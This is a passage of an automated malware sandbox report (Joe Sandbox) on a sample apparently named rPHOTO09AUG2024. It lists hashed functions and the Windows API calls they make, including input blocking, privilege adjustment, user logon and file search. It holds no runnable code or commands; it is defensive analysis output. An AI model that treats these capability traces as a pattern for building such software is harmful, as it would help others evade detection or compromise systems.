Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0u
API String ID: 2893107130-1339160046
Opcode ID: 66b8cbb036f4faa3a1b9082bde044d6d564979c4a99e2619538bae85866cecb4
Instruction ID: fd3fcd8ee04451b9acb79d8dd0a77d5cc3c7e34cc7bd0f0324f3a0d1135fe38d
Opcode Fuzzy Hash: 66b8cbb036f4faa3a1b9082bde044d6d564979c4a99e2619538bae85866cecb4
Instruction Fuzzy Hash: 0D21E4726355108FC729CF25D841A52B3E1EFA5311B288E6CD4F9CB2D0CA35BD45DBA4

Function 00D4E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071985598a3d72c8b8c58dadb1f209e504229731b4a5a828c15c5b7cd77acf22
Instruction ID: 5fa485d6da72d0e5e7bfe6b229f62a901bdffaeeb2639efa6a55d6c3350228fa
Opcode Fuzzy Hash: 071985598a3d72c8b8c58dadb1f209e504229731b4a5a828c15c5b7cd77acf22
Instruction Fuzzy Hash: C1229074A00215EFDB24DF58C485AAEB7F1FF04300F188569E89AAB351E774E985CBB1

Function 00DAC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DAC966
FindClose.KERNEL32(00000000), ref: 00DAC996

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 2f07cd07e2966ebb04494d3d176e25da1ff8aa948127eb933a24aae8c74e3f05
Instruction ID: 509936107b9d9b8392e47bb0e74bda6d2402b5eef8e8e9eaf3aefd3be5ce903f
Opcode Fuzzy Hash: 2f07cd07e2966ebb04494d3d176e25da1ff8aa948127eb933a24aae8c74e3f05
Instruction Fuzzy Hash: FC115E726106019FDB10EF29D855A6BF7E9EF85325F04851EF8A9D73A1DB30AC00CBA1

Function 00DAA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DB977D,?,00DCFB84,?), ref: 00DAA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DB977D,?,00DCFB84,?), ref: 00DAA314

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6866c67c21ed7cd443b459dc9e58b1594f105f543c64f380ec5a72bc8e05174b
Instruction ID: 6a671f07dda767c8b3f56bccfa5a30bef9680b1ca0ca54c7574d9d8588ae2ec8
Opcode Fuzzy Hash: 6866c67c21ed7cd443b459dc9e58b1594f105f543c64f380ec5a72bc8e05174b
Instruction Fuzzy Hash: F2F05E3554422EABDB109FA8CC48FEA776DEF09761F008265B908D6281D7309944CBB1

Function 00D98713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98851), ref: 00D98728
CloseHandle.KERNEL32(?,?,00D98851), ref: 00D9873A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a8bc2c1ec98fc1df1a0c972528a7ec09d5649427429de17905fd151f68276927
Instruction ID: 7a071ae991a5f868bd49df55f385e193d7b3c149f88e91089e9d9b37a2d16156
Opcode Fuzzy Hash: a8bc2c1ec98fc1df1a0c972528a7ec09d5649427429de17905fd151f68276927
Instruction Fuzzy Hash: 85E0BF75010651EFEB252B60EC05D7777A9EB04750B248429F456C0470DB616C90DB70

Function 00D6A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D68F97,?,?,?,00000001), ref: 00D6A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00D6A3A3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4bb422965853acae258acf8d19e21d7b4d648b9758e96b57a85b76e15d88fb47
Instruction ID: 6bd045144d36314646c62453ce30d13cefd4f6d721ccb4f4a9f49b231469b4f3
Opcode Fuzzy Hash: 4bb422965853acae258acf8d19e21d7b4d648b9758e96b57a85b76e15d88fb47
Instruction Fuzzy Hash: C6B0923105434BBBCA002B91EC09FC83F6AEB84AA2F404020FA0DC4260CB6256528AA1

Function 00D6F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3dac0c0d4b03b25160ccdf2a07c6b3ae46bc27b9a316d2e10892a40dfc48904
Instruction ID: 5e7d63eba17bb8839a37a9491b9d1845fcd15a25012cf0b9eee1593e61eb0c90
Opcode Fuzzy Hash: f3dac0c0d4b03b25160ccdf2a07c6b3ae46bc27b9a316d2e10892a40dfc48904
Instruction Fuzzy Hash: A5321722D69F014ED7239638E872335A749AFB73C4F55D737F819B5AA6EB28C4834110

Function 00D7267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9b57c9666998094d28bc7ada2979c2828d87a50b613e8cb564f4935b02965d
Instruction ID: 932c23514f3def8bc035e68664809136da99edd6834465988be62d2e901a1d79
Opcode Fuzzy Hash: 3b9b57c9666998094d28bc7ada2979c2828d87a50b613e8cb564f4935b02965d
Instruction Fuzzy Hash: 7BB1F220D2AF514DD72396398871336B79CAFBB2D5F52D71BFC2AB4E22EB2185834141

Function 00DB41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00DB4218

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6d135f5dc3ddb903f9cf039e5f8334f64ebaf815a46f085e6ac6f760c21a910e
Instruction ID: 29c1ca651c5d1f54d637c83c6215f61930c5473ed3718aefb50a23838648b06f
Opcode Fuzzy Hash: 6d135f5dc3ddb903f9cf039e5f8334f64ebaf815a46f085e6ac6f760c21a910e
Instruction Fuzzy Hash: 0CE04F712802159FC710EF6AD845E9BF7E8EF94760F008026FC4AC7352DA70E8408BB0

Function 00DA4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00DA4EEC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ee4245c7a987d837f9073d8669b3759c8cf340ab360693438401cea55dd6a573
Instruction ID: 559c2867f3ca0120de66759da57e916f2dffe0bc357d73e8bf1969fb0be74482
Opcode Fuzzy Hash: ee4245c7a987d837f9073d8669b3759c8cf340ab360693438401cea55dd6a573
Instruction Fuzzy Hash: 87D05E9916070539EC584B249C5FF770149F382781FE8414AB542C90C1D8D0AE515030

Function 00D98C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D988D1), ref: 00D98CB3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
Instruction ID: f49b1ec90247dbb959a382912a5dbba3ad30151e10d5a86c494e68a38186654b
Opcode Fuzzy Hash: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
Instruction Fuzzy Hash: E1D09E3226460EABEF019FA4DD05EEE3B6AEB04B01F408511FE15D51A1C775D935AB60

Function 00D82230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00D82242

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: f1451ba8f3b7ce414cfd949902942cdc0dddb28fd5588c29485ffdbf6fff403c
Instruction ID: c64291cb8d7f9d64a7b599be500f37a9da37f83643e6c20dc7289f7f93a3cd3b
Opcode Fuzzy Hash: f1451ba8f3b7ce414cfd949902942cdc0dddb28fd5588c29485ffdbf6fff403c
Instruction Fuzzy Hash: 7BC04CF580110ADBDB05DB90D988DEE77BDAB04304F104066A142F2100D7749B489F71

Function 00D6A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00D6A36A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ce3273ea63ce8096ea190a9956d12437ab05fe822a4658ec9a80be928e50918d
Instruction ID: 5fab3f07f529ed7e50d760a3439acec3ef97946ff1932ad995580ec7094276d2
Opcode Fuzzy Hash: ce3273ea63ce8096ea190a9956d12437ab05fe822a4658ec9a80be928e50918d
Instruction Fuzzy Hash: E4A0123000020EB78A001B41EC048847F5DD6401907004020F40C80121873255114590

Function 00D58A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14d7f0263bf5ad541695198cd40042035b87a8931862cbb699f991e6adff8d9
Instruction ID: 771bc53f5cae5ec46e15ca8550296fd63d5b325dce783d2055517bee55607d10
Opcode Fuzzy Hash: a14d7f0263bf5ad541695198cd40042035b87a8931862cbb699f991e6adff8d9
Instruction Fuzzy Hash: 21224930A01616CBDF29CF28D49467D77A1EB41342F2C847ADC92AB295DB30DD89EB70

Function 00D62405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: c3c1b13213a4f631da157780ab717739105dd856875238b5c66118b640a58042
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: D0C16C362055930BDB2D863A947413EBAE15FA27B131E0B6DE8B3DB5D4EF20D524A630

Function 00D6283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: c5368d99a6d13541b5a2ba0b13e9b0a318badc72dd423b89adc85721f962df3f
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 63C16D372055930BDB2D463A847403FBBA15FA27B131E076EE8B2DB5D4EF20D524A630

Function 00D61BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: b4c00d891a821cdbd9ad62ea8bcb984413064dfcdb806f7993ea443a1c41d807
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 37C15E3B2091930BDB6D463A943413FBAE15FA27B131E0B6DE4B2CB5D5EF20D524A630

Function 010835E0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 16e16201494028a94556e54420c536647577ad312ce098872b8b9af4b58c2125
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8A41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D556AB345D730AB41DB40

Function 010834D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: e09d5acc99ef2a33dbed0a5b93835344257ee2f73cf25a7bcc63bd887ec5e03f
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 57019278A04109EFCB45EF98C5909AEF7F5FB88710F208599D849AB701E730EE41DB90

Function 01083470 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: f0cea8f2ae862be9677f4198b92b814047e7c7e55121f588ba865abdeffa240e
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 62018078A05109EFCB45EF98C5909AEF7F5FB88610B208599D949AB701EB34EE41DB80

Function 01081E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00DB7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DB7B70
DeleteObject.GDI32(00000000), ref: 00DB7B82
DestroyWindow.USER32 ref: 00DB7B90
GetDesktopWindow.USER32 ref: 00DB7BAA
GetWindowRect.USER32(00000000), ref: 00DB7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00DB7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DB7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7D4A
GetClientRect.USER32(00000000,?), ref: 00DB7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DB7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7DF8
GlobalFree.KERNEL32(00000000), ref: 00DB7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DD2CAC,00000000), ref: 00DB7E2B
GlobalFree.KERNEL32(00000000), ref: 00DB7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00DB7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DB7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7EA2
